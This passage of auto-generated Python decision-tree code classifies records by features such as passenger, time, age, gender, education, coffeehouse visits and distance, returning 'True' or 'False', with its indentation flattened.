if obj[0]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.4444, "depth": 11}
if obj[0]>1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[4]>4:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Education", "instances": 95, "metric_value": 0.3455, "depth": 8}
if obj[6]>0:
# {"feature": "Passanger", "instances": 69, "metric_value": 0.2466, "depth": 9}
if obj[0]<=1:
# {"feature": "Restaurant20to50", "instances": 67, "metric_value": 0.2445, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 46, "metric_value": 0.3062, "depth": 11}
if obj[4]>2:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3742, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2975, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Gender", "instances": 23, "metric_value": 0.1897, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Age", "instances": 21, "metric_value": 0.0847, "depth": 11}
if obj[4]<=3:
return 'False'
elif obj[4]>3:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1778, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.4242, "depth": 9}
if obj[3]>0:
# {"feature": "Age", "instances": 15, "metric_value": 0.3889, "depth": 10}
if obj[4]<=4:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4583, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 11, "metric_value": 0.2727, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[4]>0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Direction_same", "instances": 118, "metric_value": 0.3094, "depth": 7}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 86, "metric_value": 0.2449, "depth": 8}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 65, "metric_value": 0.176, "depth": 9}
if obj[6]>1:
# {"feature": "Age", "instances": 44, "metric_value": 0.083, "depth": 10}
if obj[4]>2:
# {"feature": "Passanger", "instances": 23, "metric_value": 0.1491, "depth": 11}
if obj[0]<=1:
# {"feature": "Gender", "instances": 14, "metric_value": 0.2413, "depth": 12}
if obj[3]>0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1852, "depth": 13}
if obj[12]<=2:
return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.2, "depth": 13}
if obj[12]<=2:
return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Age", "instances": 21, "metric_value": 0.3175, "depth": 10}
if obj[4]<=2:
# {"feature": "Distance", "instances": 15, "metric_value": 0.381, "depth": 11}
if obj[12]>1:
# {"feature": "Passanger", "instances": 14, "metric_value": 0.3429, "depth": 12}
if obj[0]<=1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4667, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Passanger", "instances": 21, "metric_value": 0.3464, "depth": 9}
if obj[0]<=2:
# {"feature": "Age", "instances": 16, "metric_value": 0.2396, "depth": 10}
if obj[4]>2:
# {"feature": "Education", "instances": 12, "metric_value": 0.1458, "depth": 11}
if obj[6]>0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2, "depth": 12}
if obj[12]<=2:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Distance", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[6]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Age", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[4]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[6]<=2:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 32, "metric_value": 0.3842, "depth": 8}
if obj[4]>2:
# {"feature": "Distance", "instances": 21, "metric_value": 0.4222, "depth": 9}
if obj[12]<=1:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.4308, "depth": 10}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 13, "metric_value": 0.4249, "depth": 11}
if obj[6]>2:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[3]>0:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[0]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]<=2:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[0]<=1:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[0]>1:
return 'False'
elif obj[0]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[10]<=1.0:
return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Passanger", "instances": 11, "metric_value": 0.1212, "depth": 9}
if obj[0]<=1:
return 'False'
elif obj[0]>1:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[6]>1:
return 'False'
elif obj[6]<=1:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 80, "metric_value": 0.2039, "depth": 6}
if obj[0]<=2:
# {"feature": "Distance", "instances": 76, "metric_value": 0.1805, "depth": 7}
if obj[12]>1:
# {"feature": "Gender", "instances": 50, "metric_value": 0.1036, "depth": 8}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Age", "instances": 22, "metric_value": 0.2143, "depth": 9}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.2984, "depth": 10}
if obj[10]>1.0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[6]>1:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2, "depth": 12}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[9]>0.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 12}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Age", "instances": 26, "metric_value": 0.284, "depth": 8}
if obj[4]>2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.4103, "depth": 9}
if obj[9]<=3.0:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4167, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4167, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.1026, "depth": 9}
if obj[9]<=2.0:
return 'False'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[6]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 4, "metric_value": 0.0, "depth": 7}
if obj[4]>3:
return 'False'
elif obj[4]<=3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]<=1.5424315569353801:
# {"feature": "Age", "instances": 159, "metric_value": 0.2582, "depth": 5}
if obj[4]<=6:
# {"feature": "Restaurant20to50", "instances": 152, "metric_value": 0.2379, "depth": 6}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 151, "metric_value": 0.2335, "depth": 7}
if obj[11]<=0:
# {"feature": "Education", "instances": 118, "metric_value": 0.1898, "depth": 8}
if obj[6]>0:
# {"feature": "Time", "instances": 66, "metric_value": 0.11, "depth": 9}
if obj[1]>1:
# {"feature": "Coffeehouse", "instances": 40, "metric_value": 0.0467, "depth": 10}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Passanger", "instances": 15, "metric_value": 0.1143, "depth": 11}
if obj[0]<=1:
return 'False'
elif obj[0]>1:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=1:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.1828, "depth": 10}
if obj[0]<=1:
# {"feature": "Coffeehouse", "instances": 19, "metric_value": 0.0936, "depth": 11}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[12]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[12]<=2:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Coffeehouse", "instances": 52, "metric_value": 0.2564, "depth": 9}
if obj[9]<=1.0:
# {"feature": "Distance", "instances": 39, "metric_value": 0.1736, "depth": 10}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.2337, "depth": 11}
if obj[0]>1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.0938, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
return 'True'
else: return 'True'
else: return 'False'
elif obj[0]<=1:
# {"feature": "Time", "instances": 10, "metric_value": 0.3048, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Distance", "instances": 13, "metric_value": 0.3846, "depth": 10}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4167, "depth": 11}
if obj[0]>1:
# {"feature": "Time", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[1]>2:
return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 33, "metric_value": 0.3216, "depth": 8}
if obj[1]<=1:
# {"feature": "Education", "instances": 28, "metric_value": 0.2434, "depth": 9}
if obj[6]<=2:
# {"feature": "Coffeehouse", "instances": 27, "metric_value": 0.2438, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.2125, "depth": 11}
if obj[12]<=1:
# {"feature": "Gender", "instances": 20, "metric_value": 0.2526, "depth": 12}
if obj[3]>0:
# {"feature": "Passanger", "instances": 19, "metric_value": 0.2659, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[0]<=1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 9}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[0]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[12]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3429, "depth": 6}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.4, "depth": 7}
if obj[0]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 9}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 10}
if obj[6]<=5:
# {"feature": "Coffeehouse", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[9]<=0.0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 797, "metric_value": 0.4734, "depth": 4}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 590, "metric_value": 0.4585, "depth": 5}
if obj[6]<=1:
# {"feature": "Age", "instances": 296, "metric_value": 0.4757, "depth": 6}
if obj[4]>2:
# {"feature": "Occupation", "instances": 192, "metric_value": 0.4847, "depth": 7}
if obj[7]>0:
# {"feature": "Gender", "instances": 184, "metric_value": 0.4827, "depth": 8}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 125, "metric_value": 0.4625, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Passanger", "instances": 95, "metric_value": 0.4844, "depth": 10}
if obj[0]>0:
# {"feature": "Distance", "instances": 86, "metric_value": 0.4949, "depth": 11}
if obj[12]>1:
# {"feature": "Time", "instances": 57, "metric_value": 0.4881, "depth": 12}
if obj[1]<=2:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4974, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4589, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Time", "instances": 29, "metric_value": 0.4713, "depth": 12}
if obj[1]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]<=1:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.2667, "depth": 11}
if obj[1]<=2:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Passanger", "instances": 30, "metric_value": 0.35, "depth": 10}
if obj[0]>0:
# {"feature": "Time", "instances": 28, "metric_value": 0.3673, "depth": 11}
if obj[1]<=3:
# {"feature": "Distance", "instances": 21, "metric_value": 0.3968, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.381, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2286, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Time", "instances": 59, "metric_value": 0.4309, "depth": 9}
if obj[1]>0:
# {"feature": "Passanger", "instances": 44, "metric_value": 0.4893, "depth": 10}
if obj[0]<=1:
# {"feature": "Distance", "instances": 36, "metric_value": 0.4715, "depth": 11}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 20, "metric_value": 0.4357, "depth": 12}
if obj[9]<=2.0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3929, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Coffeehouse", "instances": 16, "metric_value": 0.4643, "depth": 12}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.381, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[0]>1:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3714, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Distance", "instances": 15, "metric_value": 0.1897, "depth": 10}
if obj[12]<=2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.1319, "depth": 11}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2143, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[9]>2.0:
return 'False'
elif obj[9]<=2.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.0, "depth": 8}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Passanger", "instances": 104, "metric_value": 0.36, "depth": 7}
if obj[0]>0:
# {"feature": "Distance", "instances": 80, "metric_value": 0.3195, "depth": 8}
if obj[12]>1:
# {"feature": "Time", "instances": 50, "metric_value": 0.3572, "depth": 9}
if obj[1]<=1:
# {"feature": "Gender", "instances": 31, "metric_value": 0.233, "depth": 10}
if obj[3]>0:
# {"feature": "Occupation", "instances": 18, "metric_value": 0.3639, "depth": 11}
if obj[7]<=6:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[11]<=0:
# {"feature": "Coffeehouse", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[9]<=1.0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[7]>6:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.125, "depth": 12}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Occupation", "instances": 19, "metric_value": 0.3947, "depth": 10}
if obj[7]>1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4409, "depth": 11}
if obj[3]>0:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.4364, "depth": 12}
if obj[9]>0.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[9]>0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 30, "metric_value": 0.17, "depth": 9}
if obj[7]>1:
# {"feature": "Time", "instances": 20, "metric_value": 0.09, "depth": 10}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.175, "depth": 11}
if obj[3]>0:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.2188, "depth": 12}
if obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
